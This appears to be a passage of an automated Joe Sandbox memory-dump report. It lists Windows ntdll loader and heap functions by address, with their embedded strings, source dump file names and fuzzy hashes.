                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 36DBA589
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: d8088aa21f69d19561a68139518a4ed9c35ef64523beeb411c38dfc1e68c5ee8
                                                  • Instruction ID: f1244b1bb825dfe1c41d9e0af89b054a670e895aa7d7b16d0d17320932c3d2d8
                                                  • Opcode Fuzzy Hash: d8088aa21f69d19561a68139518a4ed9c35ef64523beeb411c38dfc1e68c5ee8
                                                  • Instruction Fuzzy Hash: 625110B4A007419BEB11CF29CD40B1A7FF4EF00758F1C02A5E9919B6E5DB74EA00CB96
                                                  Function 36D4758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                  • API String ID: 0-1151232445
                                                  • Opcode ID: f1ea2f342a179f94e5466d5b18b783ceab98b846a578b38cec01b34f1db85f67
                                                  • Instruction ID: 64253f1226622fc8d01292b22dbaa2f250b5f29b654d7f3ad500444e7008c35a
                                                  • Opcode Fuzzy Hash: f1ea2f342a179f94e5466d5b18b783ceab98b846a578b38cec01b34f1db85f67
                                                  • Instruction Fuzzy Hash: 124126B4B043808FFF1ADB69C484B6977E29F05388F68416DE4858F646DEB4DC86CB91
                                                  Function 36D816CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36DC1B39
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 36DC1B4A
                                                  • LdrpAllocateTls, xrefs: 36DC1B40
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-4274184382
                                                  • Opcode ID: 55184ac3289450455c162438b7c0422dfd6e61540a923d90445b1d5e5dd7c26c
                                                  • Instruction ID: 407af60224febfa1644bfc2c9c3d04d01c43db0dd3423865698dc13e85369201
                                                  • Opcode Fuzzy Hash: 55184ac3289450455c162438b7c0422dfd6e61540a923d90445b1d5e5dd7c26c
                                                  • Instruction Fuzzy Hash: 344179B5E01619EFDB05CFA9CC40AAEBBF6FF48704F518119E505A7640DB35A805CBA0
                                                  Function 36E05180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-964947082
                                                  • Opcode ID: 63cc6d3e1a5c9dac0e4956a38cc0631a8cc45ab5263e447063012ab137d39831
                                                  • Instruction ID: bdcc738e51f24c2335a02594d4c516252842268c61264e5663c182be3e16eccf
                                                  • Opcode Fuzzy Hash: 63cc6d3e1a5c9dac0e4956a38cc0631a8cc45ab5263e447063012ab137d39831
                                                  • Instruction Fuzzy Hash: 5641C5F5911354EFE711EF67CA80E6A3BB9EF04308F604069EA2197245CA30C85DCF51
                                                  Function 36D833A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: %s() passed the empty activation context data, xrefs: 36DC29FE
                                                  • RtlCreateActivationContext, xrefs: 36DC29F9
                                                  • Actx , xrefs: 36D833AC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                  • API String ID: 0-859632880
                                                  • Opcode ID: 710293105d64d9ab09dd695e62d2f639b891f6b68197c55e824dfeb51a9ab61a
                                                  • Instruction ID: d53b9cf821013593dbfaf940b058b475850d4e79323f27bf36cbf369beac3c2f
                                                  • Opcode Fuzzy Hash: 710293105d64d9ab09dd695e62d2f639b891f6b68197c55e824dfeb51a9ab61a
                                                  • Instruction Fuzzy Hash: D7312232640315AFEB16CFA9D884F9637A4EF88724F524469ED0CDF691CB32D855CBA0
                                                  Function 36DDB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • GlobalFlag, xrefs: 36DDB68F
                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 36DDB632
                                                  • @, xrefs: 36DDB670
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                  • API String ID: 0-4192008846
                                                  • Opcode ID: a5fbbbcbeeeccd640e756dd54811e801caf8fe50373c359cb2308f053f0580b4
                                                  • Instruction ID: 6895fd23f7b1c01d2285b09e5d26e14571d42bf9f823b64b39f02ca8e79754c6
                                                  • Opcode Fuzzy Hash: a5fbbbcbeeeccd640e756dd54811e801caf8fe50373c359cb2308f053f0580b4
                                                  • Instruction Fuzzy Hash: 83314CB5D00219AFDB00EF95DC80AEEBBB8EF44748F500469E605AB150DB749E04CBA4
                                                  Function 36DF13B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                                  • API String ID: 0-1050206962
                                                  • Opcode ID: effba3c962f97a75b64f4dc25a0923af40bc9be3efb315836a9fb3632abdd220
                                                  • Instruction ID: c0ad77781165e26a958d3f712c829f0db16a3366fdcd785c574dca15bb748f08
                                                  • Opcode Fuzzy Hash: effba3c962f97a75b64f4dc25a0923af40bc9be3efb315836a9fb3632abdd220
                                                  • Instruction Fuzzy Hash: 9A317A72D10619BFEB01CF95CC80EEEBBBDEB48658F420465EA04BB210D7399D048BA1
                                                  Function 36D81607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • DLL "%wZ" has TLS information at %p, xrefs: 36DC1A40
                                                  • LdrpInitializeTls, xrefs: 36DC1A47
                                                  • minkernel\ntdll\ldrtls.c, xrefs: 36DC1A51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                  • API String ID: 0-931879808
                                                  • Opcode ID: 0114afd473727339faa97148457da40328ff62bfb7e6e96aa25a2572ec7d28c6
                                                  • Instruction ID: 37f8b13d0eaf27eb9e190b47596cd39d316b9dca10c72038e0147aeb88ddc652
                                                  • Opcode Fuzzy Hash: 0114afd473727339faa97148457da40328ff62bfb7e6e96aa25a2572ec7d28c6
                                                  • Instruction Fuzzy Hash: ED31E271E10216FBF7118B65CC4AF5A7BB9EB80354F150169E684BB180DB70AD4ECBE0
                                                  Function 36D91270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 36D9127B
                                                  • @, xrefs: 36D912A5
                                                  • BuildLabEx, xrefs: 36D9130F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 0-3051831665
                                                  • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                  • Instruction ID: b9bf6fadb6c902c37b9ea27c1e662b414ccf0c44961cffad844d1e2850507783
                                                  • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                  • Instruction Fuzzy Hash: 43319F7290061DAFDB11DFA5CD40EDEBBF9EB84764F404025E914AB2A0D730DA05CBA5
                                                  Function 36D474B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: RtlValidateHeap
                                                  • API String ID: 3446177414-1797218451
                                                  • Opcode ID: 52286b88893c67b7b18a1e5841324c2ec02ecd65ec76b5de70639d9b5038b532
                                                  • Instruction ID: 7da1591e977d5e15bf0209bc7a32a29539c75698d09fb2c8f19a0bfa9924865a
                                                  • Opcode Fuzzy Hash: 52286b88893c67b7b18a1e5841324c2ec02ecd65ec76b5de70639d9b5038b532
                                                  • Instruction Fuzzy Hash: AF412676F043959FEB02DF74C8947BDBBB2BF80214F588659D851AB280CB349A05DBA1
                                                  Function 36DF705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: kLsE
                                                  • API String ID: 3446177414-3058123920
                                                  • Opcode ID: a19aef5df28430c6ffeee6c9b6904bbb9d5b91d404f5b9a71a6ee8d5e5c1de5d
                                                  • Instruction ID: 04c0f121339af3ce58e358772c50e9845403c6e8bcded975ebb2afd401fb1398
                                                  • Opcode Fuzzy Hash: a19aef5df28430c6ffeee6c9b6904bbb9d5b91d404f5b9a71a6ee8d5e5c1de5d
                                                  • Instruction Fuzzy Hash: 2E415C7292235087E712AF71DC88BA53BA5EB40754F220569EF50AE1C1C7B6449FCBB2
                                                  Function 36D652A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$@
                                                  • API String ID: 0-149943524
                                                  • Opcode ID: 1ff2a9009a7ac8454afc44bf51f0d06e4d9a032e1a02efe413ab9d75b60d6ea9
                                                  • Instruction ID: c127892f039569e56e14d797764bed0d89d8aa64d4d974fa4e1a877b76aab03b
                                                  • Opcode Fuzzy Hash: 1ff2a9009a7ac8454afc44bf51f0d06e4d9a032e1a02efe413ab9d75b60d6ea9
                                                  • Instruction Fuzzy Hash: 3332A0B89083518BEB14CF16C98073EB7F1EF89748F90491EF985972A4E774D894CB92
                                                  Function 36D55702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 72996a99846c028ecda205d922d2fe838f940d08accf8e164aea949fb785262d
                                                  • Instruction ID: 0929e347f9870b5a6ebce91ea3cbdee213e24edb4888903b1ed2388307b10a23
                                                  • Opcode Fuzzy Hash: 72996a99846c028ecda205d922d2fe838f940d08accf8e164aea949fb785262d
                                                  • Instruction Fuzzy Hash: F231EE35A11B12EFEB429F20CE80A89F7BAFF44388F515025EA4157E50DB70E921CBD1
                                                  Function 36D6F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$$
                                                  • API String ID: 3446177414-233714265
                                                  • Opcode ID: 50e34551db103af0c411f25dde763f45df242423420e2102bd9623ef5a56edf2
                                                  • Instruction ID: b740bd04d6a075031d197669960ea6213b8dcd781e2dedc51553285c1c2042ec
                                                  • Opcode Fuzzy Hash: 50e34551db103af0c411f25dde763f45df242423420e2102bd9623ef5a56edf2
                                                  • Instruction Fuzzy Hash: 1261DEB1E01B89DBEB20CFA6C980B9DB7B2FF4430CF904469D515AF650CB34A945CBA1
                                                  Function 36DE35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                  • API String ID: 0-118005554
                                                  • Opcode ID: f374889117d14fab8d130942974566fbfc0b9ee8851bab6f2aa26fce29f1e053
                                                  • Instruction ID: 2241c0f00ceea5573123f0e107d23a66cdb9cbec4e8d25772aff7078b0b8df7f
                                                  • Opcode Fuzzy Hash: f374889117d14fab8d130942974566fbfc0b9ee8851bab6f2aa26fce29f1e053
                                                  • Instruction Fuzzy Hash: A531DA756083819BD301CB3AD854B2AB3E4EF85758F42286DF984CB790EB30D905CBA2
                                                  Function 36D8329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local\$@
                                                  • API String ID: 0-380025441
                                                  • Opcode ID: bc676bcaf4802411d694b6524bced15a31b277448d7bbbdf48581e115996e5f0
                                                  • Instruction ID: 2a9b3b957301661598eab7b3bc16924844057f305189e54e5f9a833b2d87780f
                                                  • Opcode Fuzzy Hash: bc676bcaf4802411d694b6524bced15a31b277448d7bbbdf48581e115996e5f0
                                                  • Instruction Fuzzy Hash: DA3192B55093049FE311CF69C884A5BBBF8EB85658F41092EF99C83610DA30DD04CBA2
                                                  Function 36D834B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 36DC2A95
                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 36DC2A90
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                  • API String ID: 0-2653619699
                                                  • Opcode ID: 2403f48cba2f36e82fa448e88955235acaeca96ad7a1b61e540fb721374e7b28
                                                  • Instruction ID: aa5425af4318b98695afcdf09cdd5ac1cde5f46f22cfa3cbc8069397966d84a7
                                                  • Opcode Fuzzy Hash: 2403f48cba2f36e82fa448e88955235acaeca96ad7a1b61e540fb721374e7b28
                                                  • Instruction Fuzzy Hash: F4112976B00214FBF7258B8D8D45F5B76A9DBC8B58F258069B908EB250D675CD00C6E4
                                                  Function 36D7B2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @[6@[6
                                                  • API String ID: 0-1493792968
                                                  • Opcode ID: c1257064948172b02564ae8e2eb438b5caf3656cf0218299eee93796320cfea8
                                                  • Instruction ID: 344ef5231a78344189cda40bab6068b5a5166cd557b9df2d17b340480576ec0f
                                                  • Opcode Fuzzy Hash: c1257064948172b02564ae8e2eb438b5caf3656cf0218299eee93796320cfea8
                                                  • Instruction Fuzzy Hash: 5732B0B5E00219DBDF14CFA9C890BEEBBB1FF48758F140029E945AB390E7359951CB92
                                                  Function 36E231E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 36E23356
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CallFilterFunc@8
                                                  • String ID:
                                                  • API String ID: 4062629308-0
                                                  • Opcode ID: 9c43c4a5b6e2979762b4270c3d6feec9e95d0e12a221a20422adbc311a973bf3
                                                  • Instruction ID: 8ecd255a9deb3bb400bf60dab580784aad9a1f3070da6c99f8935960407b7522
                                                  • Opcode Fuzzy Hash: 9c43c4a5b6e2979762b4270c3d6feec9e95d0e12a221a20422adbc311a973bf3
                                                  • Instruction Fuzzy Hash: 3FC127B99017298FDB20DF1AC984699FBF6FF88318F5081AED54DA7250D734AA85CF40
                                                  Function 36D51131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 35ba4d6613ff4f1006077eedd2289ae929595c2c55f6c4c2283633914034074d
                                                  • Instruction ID: e1fb79506fb2bf0e87dfa5adc210cc93efebdffa38d663ad4d49ef7e13b86dfc
                                                  • Opcode Fuzzy Hash: 35ba4d6613ff4f1006077eedd2289ae929595c2c55f6c4c2283633914034074d
                                                  • Instruction Fuzzy Hash: F5B122B59093408FD754CF29C980A5AFBF1BF88304F5449AEE899CB352D771E845CB92
                                                  Function 36D57370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2205807a587f11a9dc51f2b082ce4212b60416863649a1efe817104a58f132f7
                                                  • Instruction ID: f5764adfaaafbdeb219cd9f18d2a90c0637af820c7f97cef164fdde2863b55e6
                                                  • Opcode Fuzzy Hash: 2205807a587f11a9dc51f2b082ce4212b60416863649a1efe817104a58f132f7
